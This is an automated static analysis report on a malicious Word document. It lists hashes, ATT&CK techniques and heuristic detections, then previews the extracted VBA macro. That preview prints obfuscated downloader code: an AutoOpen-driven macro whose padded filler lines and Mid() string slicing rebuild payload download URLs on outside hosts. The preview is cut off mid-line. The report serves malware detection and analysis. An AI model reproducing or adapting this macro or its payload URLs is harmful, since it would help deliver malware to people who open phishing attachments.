Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9cf6788755dc5f8…

MALICIOUS

Office (OLE)

249.0 KB Created: 2017-12-28 07:34:00 Authoring application: Microsoft Office Word First seen: 2018-01-08
MD5: a91c39d4614506361302a8ec345a857a SHA-1: b9c59e6260ab890d1334f2a7b538eec1f1f237d5 SHA-256: f9cf6788755dc5f82017e62b08f8f36eaf92806de4c89110207a13da27d7529f
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a downloaded payload. The script reconstructs a URL from concatenated strings, which appears to be the primary download source for the secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure' further supports the malicious intent.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 96843 bytes
SHA-256: a7105c63029e8ef9806d33d9eb77b0769e1dd18de8a79d70574fe1207586d4d9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IlGhtlQuR"
Function wVbVwiSEbQodvj()
On Error Resume Next
kuhoahLFLL = (247 - Tan(733 * CInt(2865)) * PHMmItAj - ZjBwbOOYXTLWlr / (4772 - CStr(ksAwvdUJw) + iUmRw3 + CDate(orhEwbWcpvU / CDbl(FZNavsBfmd - zBQsBoVEZ * 318 / Atn(8673))) * QnWhUbs + CSng(uwwsNmblUhbHQ)))
zSZnwPl = (247 - Tan(733 * CInt(2865)) * CkGjNLpjYhjP - jdpOjuTYnHRw / (4772 - CStr(ldROnhpwjsK) + iUmRw3 + CDate(rqTiwCvbTw / CDbl(NplfNIPc - iiaLRJtCakzki * 318 / Atn(8673))) * pEzuqFVXLoUEY + CSng(BbpTQVr)))
DLKzV = Mid("1300HVac4sblU7onRAfqkNtkIBtpF4/P60u/zbE+zbE,hzbE6Rp+6Rp+zbEttz'+'bE+zbEp:/6Rp+6Rp/medizbE+zbE6Rp+6Rp'+'amulzbE+z'+'bEtizbE+zbEkaz'+'bE+zbErya.com/VzbE+zbE88bzbE+zbEs6Rp+6RpkzbE+zbEk/,h'+'ttp:77j", 31, 161)
difElowVd = (247 - Tan(733 * CInt(2865)) * KbhCfiUoTquSo - rtbRJqshUGnd / (4772 - CStr(QTncSnXcu) + iUmRw3 + CDate(RvJVFcFzvwoubG / CDbl(waAdHbOB - DUfOciQKw * 318 / Atn(8673))) * JVAVnFOIsfdVs + CSng(RUNXznYCusRk)))
NkDKYAPvlod = (247 - Tan(733 * CInt(2865)) * blwPZpjabr - jZzPLniQ / (4772 - CStr(rESRJaV) + iUmRw3 + CDate(GGAiXoooEn / CDbl(EbCwkBvJwiCrdi - iWShGwTO * 318 / Atn(8673))) * UqXLlJaGAi + CSng(doFiPNQW)))
IlsRiflvBGE = (247 - Tan(733 * CInt(2865)) * rVQiiziwpwENXs - WWnicwwIR / (4772 - CStr(KJVGbHECIXnbz) + iUmRw3 + CDate(YJkcWIKbuFjXEj / CDbl(zuNzpToN - OqAKPUiuZpJSO * 318 / Atn(8673))) * mIijOPaDCV + CSng(KdabIfjwuNfIzL)))
NDafuGoJYa = Mid("KzwZ7sP//arteazbE+zbEndizbE+zbEnozbE+zbEpzbE+zbEeruzbE+zbEazbE+zbEno.comzbE+zbE/GzbE+zbEIL0bh/z'+'6Rp+6RpbE+zbE,http'+'zbE+zbE://v2fob", 8, 123)
UnKzrLprR = (247 - Tan(733 * CInt(2865)) * DOWAQGRVWhzlM - itdjYpDwruWi / (4772 - CStr(QkSsiwYQGUXvis) + iUmRw3 + CDate(kTkaQGb / CDbl(ldrhmHXbdmMBl - oPonRYZ * 318 / Atn(8673))) * ouwwLXK + CSng(NnowjOqOmJisuI)))
UijXtiwqTu = (247 - Tan(733 * CInt(2865)) * swIRYAjQXzowd - quRCYmCPPYmHbT / (4772 - CStr(lCKrPkYj) + iUmRw3 + CDate(DGmkJwOv / CDbl(HICSZalncij - QYPFlzdHNNS * 318 / Atn(8673))) * HzSARGTKr + CSng(ULITckGcHpw)))
XLZPHvvhimi = (247 - Tan(733 * CInt(2865)) * qTfiVldoD - iozkovzRj / (4772 - CStr(ZMoXaZZBIp) + iUmRw3 + CDate(MjcGijtoKkwl / CDbl(BZsdwOjbNjsd - IDwLbjNhSIV * 318 / Atn(8673))) * JPFcWobbGVB + CSng(vCuGFwzjczX)))
aPshAZjH = Mid("fmFtzbE+zbEours.ru/zbE+zbEfzbE+zbEu'+'iXazbE+z6Rp+6RpbEKzbE+zbE6/TiX.SpzbE+zbElit(zb6Rp+6RpE+zbET'+'zbE+zbEi'+'X,TiXzbE+zbE6Rp+6R'+'p);zbE+zbEIr6Rp+6RpWkzbE+zbEarapas =z'+'bE+zbE zbEBr9qKs2q5z", 4, 178)
rTPfXaIFZ = (247 - Tan(733 * CInt(2865)) * mhXfXzknPtp - LZHkVWPZnmEDw / (4772 - CStr(UtBlGdRcN) + iUmRw3 + CDate(dmiUaDPaWUIC / CDbl(VGlaXrzdTiG - rldnMWiMWHj * 318 / Atn(8673))) * uwjWdjcJSPjiU + CSng(ulNHJEc)))
voMHnJpsWc = (247 - Tan(733 * CInt(2865)) * HjRBOjwM - tzGVUtpZuWOOJ / (4772 - CStr(jpLIzAlsluT) + iUmRw3 + CDate(BBldNpu / CDbl(UKUKKiTfEBH - wEhMCazLCAMLCQ * 318 / Atn(8673))) * noQIYTiKZVBwR + CSng(FnknYGwUZbms)))
kQqFjJwPQAP = (247 - Tan(733 * CInt(2865)) * iSlmKzZqHOXwf - HcAmGwMbFz / (4772 - CStr(JczwPziKF) + iUmRw3 + CDate(RlrWikbIS / CDbl(WXVdkHWz - dHMmTAVcsrQ * 318 / Atn(8673))) * naIqrJQcLkSns + CSng(mHTNIajibIEwXV)))
JbGtzBnBp = Mid("bzF6i6TrWK1E+z'+'bEcd = zbE+zbETizbE+zbEXhzbE+zbEMJu", 12, 38)
JdLzo = (247 - Tan(733 * CInt(2865)) * cTzJIuqfrnsi - TtIrBcjizNc / (4772 - CStr(iJuTOpWfkB) + iUmRw3 + CDate(bLsEaBNArEzmD / CDbl(haKMEfGV - dkvMcwWCqRCj * 318 / Atn(8673))) * IYFcjNkShXr + CSng(hOMTfWlG)))
IfjGUupbwuh = (247 - Tan(733 * CInt(2865)) * wawzDIu - wfdHXjX / (4772 - CStr(jQdKAHwwOIYibv) + iUmRw3 + CDate(EKABwijkomRCp / CDbl(FFkPqqqqNDp - BlukQbDqYwW * 318 / Atn(8673))) * ZKzfoXiEHQI + CSng(oOlFwOw)))
KuHbMmi = (247 - Tan(733 * CInt(2865)) * PTiplBVBGUA - CSlGbvtkSwM / (4772 - CStr(EvjKjKv) + iUmRw3 + CDate(aEtEanwLP / CDbl(bCrciwaME - sWISGakpRLS * 318 / Atn(8673))) * ZjFzYjjnzhVBVK + CSng(cRnjWGUY)))
hbsbwz = Mid("EhTNWKaqNHXFE(([CHAR]54+[CHAR]82+[CHAR]
... (truncated)